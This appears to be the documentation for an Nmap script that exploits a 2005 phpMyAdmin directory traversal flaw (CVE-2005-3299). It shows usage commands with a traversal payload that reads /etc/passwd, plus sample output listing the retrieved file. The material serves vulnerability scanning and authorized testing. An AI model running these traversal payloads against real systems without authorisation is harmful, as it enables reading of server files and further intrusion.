Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and
possibly other versions) to retrieve remote files on the web server.
nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>
PORT STATE SERVICE
80/tcp open http
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2005-3299
| Description:
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../../../../etc/passwd :
| root:x:0:0:root:/root:/bin/bash
| daemon:x:1:1:daemon:/usr/sbin:/bin/sh
| bin:x:2:2:bin:/bin:/bin/sh
| sys:x:3:3:sys:/dev:/bin/sh
| sync:x:4:65534:sync:/bin:/bin/sync
| games:x:5:60:games:/usr/games:/bin/sh
| man:x:6:12:man:/var/cache/man:/bin/sh
| lp:x:7:7:lp:/var/spool/lpd:/bin/sh
| mail:x:8:8:mail:/var/mail:/bin/sh
| news:x:9:9:news:/var/spool/news:/bin/sh
| uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
| proxy:x:13:13:proxy:/bin:/bin/sh
| www-data:x:33:33:www-data:/var/www:/bin/sh
| backup:x:34:34:backup:/var/backups:/bin/sh
| list:x:38:38:Mailing List Manager:/var/list:/bin/sh
| irc:x:39:39:ircd:/var/run/ircd:/bin/sh
| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
| nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
| libuuid:x:100:101::/var/lib/libuuid:/bin/sh
| syslog:x:101:103::/home/syslog:/bin/false
| sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
| dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
| vboxadd:x:999:1::/var/run/vboxadd:/bin/false
| mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
| memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
| ../../../../../../../../etc/passwd saved to passwd.txt
|
| References:
| http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_ http://www.exploit-db.com/exploits/1244/